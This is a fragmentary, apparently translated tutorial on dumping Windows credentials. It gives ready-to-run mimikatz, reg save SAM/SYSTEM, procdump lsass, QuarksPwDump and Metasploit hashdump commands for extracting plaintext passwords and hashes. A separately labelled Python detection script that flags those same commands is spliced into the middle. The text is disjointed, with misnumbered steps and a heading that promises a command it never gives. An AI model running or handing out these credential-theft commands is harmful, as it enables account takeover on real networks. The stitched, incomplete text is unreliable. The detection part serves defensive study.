mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
powershell -exec bypass
The process of getting a meterpreter session is omitted here; the connection is established over SMB port 445.
post/windows/gather/credentials/domain_hashdump (gets the domain hashes)
wdigest (plaintext)
4. Getting a session in CS
The session on the host needs at least administrator privileges; with user privileges, they must be elevated before credentials can be captured.
logonpasswords (plaintext)
Here I use PowerShell to bring the host online; I won't go into details about that process.
Offline password capture
1. SAM (shadow copy, registry)
Shadow copy: a shadow copy, also known as a snapshot, is a point-in-time copy of a replica stored on the Data Protection Manager (DPM) server. A replica is a full point-in-time copy of the protected shares, folders and files of a single volume on a file server.
With administrator privileges, run the following commands:
reg save hklm\sam sam.hiv
reg save hklm\system system.hiv
Then run the following command in mimikatz:
lsadump::sam /sam:sam.hiv /system:system.hiv
(2) lsass.exe (inject into the lsass.exe process and extract... from its memory)
Run the following command:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Open cmd in the directory that contains mimikatz and the dmp file, then run the following command:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
Note: both of these steps require administrator privileges; otherwise the following error is reported.
(3) Manually exporting the lsass.dmp file
Use Task Manager to export the lsass.dmp file.
The steps are the same as above.
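A defender's view of the offline-capture steps above, as an added example that is not part of the original article: a small Python triage that flags process command lines matching the reg save, procdump and mimikatz invocations shown here, and singles out hosts where both the SAM and SYSTEM hives were saved (the pair that lsadump::sam takes as input). The rule names, event field names and sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Rule names are hypothetical; the patterns mirror the commands on this page.
RULES = {
    "hive_save": re.compile(
        r'\breg(?:\.exe)?"?\s+save\s+"?hklm\\(sam|system)\b', re.I),
    "lsass_dump": re.compile(
        r'\bprocdump(?:64)?(?:\.exe)?"?(?=.*\s-ma\b).*\blsass\b', re.I),
    "mimikatz_module": re.compile(
        r'\b(?:privilege|sekurlsa|lsadump)::\w+', re.I),
}

# Constructed sample events; the host/user/cmd field names are assumptions.
EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "cmd": r"reg save hklm\sam sam.hiv"},
    {"host": "WS01", "user": "CORP\\alice", "cmd": r"reg  save HKLM\SYSTEM system.hiv"},
    {"host": "WS02", "user": "CORP\\bob",
     "cmd": r"procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"host": "WS03", "user": "CORP\\carol",
     "cmd": r'mimikatz.exe "sekurlsa::minidump lsass.dmp" exit'},
    {"host": "WS04", "user": "CORP\\dave", "cmd": r"reg save hkcu\software\app backup.hiv"},
    {"host": "WS05", "user": "CORP\\erin", "cmd": r"reg save hklm\system system.hiv"},
]

def match_rules(cmd):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))

def triage(events):
    """Return (host, matched_rules) for each event that hits at least one rule."""
    hits = []
    for ev in events:
        rules = match_rules(ev["cmd"])
        if rules:
            hits.append((ev["host"], rules))
    return hits

def hosts_with_both_hives(events):
    """Hosts where SAM and SYSTEM were both saved: lsadump::sam needs the pair."""
    saved = defaultdict(set)
    for ev in events:
        m = RULES["hive_save"].search(ev["cmd"])
        if m:
            saved[ev["host"]].add(m.group(1).lower())
    return sorted(h for h, hives in saved.items() if hives == {"sam", "system"})

if __name__ == "__main__":
    for host, rules in triage(EVENTS):
        print(host, ",".join(rules))
    print("SAM+SYSTEM saved on:", hosts_with_both_hives(EVENTS))
```

The Task Manager export in (3) leaves no such command line, so it has to be caught through process-access telemetry on lsass.exe rather than command-line matching.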
The command is as follows:
QuarksPwDump.exe -dhl -o hash.txt
Grab the plaintext
The command is as follows:
Thank you for your ideas, which are why this article exists; I would like to express my heartfelt thanks to master Yicun Yiye.
There are many more advanced methods of capturing hashes here, but because of our technical level, even when using them in practice we don't know the principle, so I'm not going to do in-depth research for the moment. I'm posting a link for interested masters, who can continue to delve into it. Wait until you have enough knowledge